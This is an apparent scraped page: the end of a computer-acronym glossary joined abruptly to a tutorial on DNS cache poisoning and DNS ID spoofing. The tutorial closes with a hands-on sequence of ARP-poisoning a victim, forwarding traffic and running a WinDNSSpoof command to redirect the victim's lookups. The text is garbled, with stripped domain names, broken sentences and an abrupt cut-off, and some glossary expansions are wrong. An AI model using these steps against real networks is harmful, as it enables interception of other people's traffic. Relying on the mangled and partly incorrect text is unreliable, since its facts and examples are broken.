NAS - Network Attached Storage
NAT - Network Address Translation
NEC - NEC Corporation
NIC - Network Interface Card

--- O ---
OC - Overclock (Over Clock)
OCZ - OCZ Technology
OEM - Original Equipment Manufacturer

--- P ---
PC - Personal Computer
PCB - Printed Circuit Board
PCI - Peripheral Component Interconnect
PDA - Personal Digital Assistant
PCMCIA - Peripheral Component Microchannel Interconnect Architecture
PGA - Professional Graphics Array
PLD - Programmable Logic Device
PM - Private Message / Private Messaging
PnP - Plug 'n Play
PNY - PNY Technology
POST - Power On Self Test
PPPoA - Point-to-Point Protocol over ATM
PPPoE - Point-to-Point Protocol over Ethernet
PQI - PQI Corporation
PSU - Power Supply Unit

--- R ---
RAID - Redundant Array of Inexpensive Disks
RAM - Random Access Memory
RAMDAC - Random Access Memory Digital Analog Convertor
RDRAM - Rambus Dynamic Random Access Memory
ROM - Read Only Memory
RPM - Revolutions Per Minute

--- S ---
SASID - Self-scanned Amorphous Silicon Integrated Display
SCA - SCSI Configured Automatically
SCSI - Small Computer System Interface
SDRAM - Synchronous Dynamic Random Access Memory
SECC - Single Edge Contact Connector
SODIMM - Small Outline Dual Inline Memory Module
SPARC - Scalable Processor ArChitecture
SOHO - Small Office Home Office
SRAM - Static Random Access Memory
SSE - Streaming SIMD Extensions
SVGA - Super Video Graphics Array
S/PDIF - Sony/Philips Digital Interface

--- T ---
TB - Terabytes
TBps - Terabytes per second
Tbps - Terabits per second
TDK - TDK Electronics
TEC - Thermoelectric Cooler
TPC - TipidPC
TWAIN - Technology Without An Important Name

--- U ---
UART - Universal Asynchronous Receiver/Transmitter
USB - Universal Serial Bus
UTP - Unshieled Twisted Pair

--- V ---
VCD - Video CD
VPN - Virtual Private Network

--- W ---
WAN - Wide Area Network
WTB - Want to Buy
WYSIWYG - What You See Is What You Get

--- X ---
XGA - Extended Graphics Array
XFX - XFX Graphics, a Division of Pine
XMS - Extended Memory Specification
XT - Extended Technology
What is DNS Spoofing ?

DNS Spoofing is the art of making a DNS entry to point to an another IP
than it would be supposed to point to. To understand better, let's see
an example.You're on your web browser and wish to see the news on, without to think of it, you just enter this URL in your
address bar and press enter.
Now, what's happening behind the scenes
? Well... basically, your browser is going to send a request to a DNS
Server to get the matching IP address for, then the DNS
server tells your browser the IP address of CNN, so your browser to
connect to CNN's IP address and display the content of the main page.
on a minute... You get a message saying that CNN's web site has closed
because they don't have anymore money to pay for their web site. You're
so amazed, you call and tell that to your best friend on the phone, of
course he's laughing at you, but to be sure, he goes to CNN web site to
check by himself.
You are surprised when he tells you he can see the
news of the day as usual and you start to wonder what's going on. Are
you sure you are talking to the good IP address ?Let's check. You ask
your friend to fire up his favorite DNS resolving tool and to give you
the IP address he's getting for you got it, you put it
in your browser URL bar :

You feel ridiculous and frustrated when you see CNN's web page with its
daily news.
you've just been the witness of a DNS hijacking scenario. You're
wondering what happened, did the DNS Server told you the wrong IP
address ? Maybe... At least this is the most obvious answer coming to
our mind.
In fact there are two techniques for accomplishing this DNS hijacking.
Let's see the first one, the "DNS ID Spoofing" technique.

1) DNS Cache Poisoning

you can imagine, a DNS server can't store information about all
existing names/IP on the net in its own memory space.That's why DNS
server have a cache, it enables them to keep a DNS record for a while.
fact, A DNS Server has the records only for the machines of the domain
it has the authority, if it needs to know about machines out of his
domain, it has to send a request to the DNS Server which handles these
machines and since it doesn't want to ask all the time about records,
it can store in its cache the replies returned by other DNS servers.
Now let's see how someone could poison the cache of our DNS Server.
attacker his running is own domain ( with his own hacked
DNS Server( . Note that I said hacked DNS Server
because the attacker customized the records in his own DNS server, for
instance one record could be
1) The attacker sends a request to your DNS Server asking it to resolve
2) Your DNS Server is not aware of this machine IP address, it doesn't
belongs to his domain, so it needs to asks to the responsible name
3) The hacked DNS Server is replying to your DNS server,
and at the same time, giving all his records (including his record
concerning Note : this process is called a zone transfer.
4) The DNS server is not "poisoned".The attacker got his IP, but who
cares, his goal was not to get the IP address of his web server but to
force a zone transfer and make your DNS server poisoned as long as the
cache will not be cleared or updated.
5) Now if you ask your DNS
server, about IP address it will give you,
where the attacker run his own web server. Or even simple, the attacker
could just run a bouncer forwarding all packets to the real web site
and vice versa,so you would see the real web site, but all your traffic
would be passing through the attacker's web site.

2) DNS ID Spoofing

saw that when a machine X wants to communicate with a machine Y, the
former always needs the latter IP address. However in most of cases, X
only has the name of Y, in that case, the DNS protocol is used to
resolve the name of Y into its IP address.
Therefore, a DNS request
is sent to a DNS Server declared at X, asking for the IP address of the
machine Y. Meanwhile, the machine X assigned a pseudo random
identification number to its request which should be present in the
answer from the DNS server.Then when the answer from the DNS server
will be received by X, it will just have to compare both numbers if
they're the same, in this case, the answer is taken as valid,otherwise
it will be simply ignored by X.
Does this concept is safe ? Not
completely. Anyone could lead an attack getting this ID number. If
you're for example on LAN, someone who runs a sniffer could intercept
DNS requests on the fly, see the request ID number and send you a fake
reply with the correct ID number... but with the IP address of his
choice.Then, without to realize it, the machine X will be talking to
the IP of attacker's choice thinking it's Y.

By the way, the DNS
protocol relies on UDP for requests (TCP is used only for zone
transfers), which means that it is easy to send a packet coming from a
fake IP since there are no SYN/ACK numbers (Unlike TCP, UDP doesn't
provide a minimum of protection against IP spoofing).

Nevertheless, there are some limitations to accomplish this attack.
my example above, the attacker runs a sniffer, intercept the ID number
and replies to his victim with the same ID number and with a reply of
his choice.
In the other hand, even if the attacker intercepted your
request, it will be transmitted to the DNS Server anyway which will
also reply to the request(unless the attacker is blocking the request
at the gateway or carry out ARP cache poisoning which would make the
attack possible on a switched network by the way).
That means that
the attacker has to reply BEFORE the real DNS server, which means that
to succeed this attack, the attacker MUST be on the same LAN so to have
a very quick ping to your machine, and also to be able to capture your

Practical example ( for
testing purposes ONLY)
To see yourself how to hijack a connection from a machine on your local
area network,we can do the followings :
First step :Poison the ARP cache of the victim's machine (tools and explanations
for realizing this task can be found at
Second step :Now, outgoing packets of the target will be redirected to your host,but
you have to forward the traffic to the real gateway, this can be
achieved witha tool like Winroute Pro.
Third step :We then use WinDNSSpoof,
developed by valgasu (
which isa tool that greatly help to carry out DNS ID Spoofing. (Before
to use this tool be sure you have the Winpcap library installed on your
machine, see
run it in the cmd like :
wds -n -i -g 00-C0-26-DD-59-CF -v
will make to point to on the victim's
machine. 00-C0-26-DD-59-C being the MAC Address of the gateway or DNS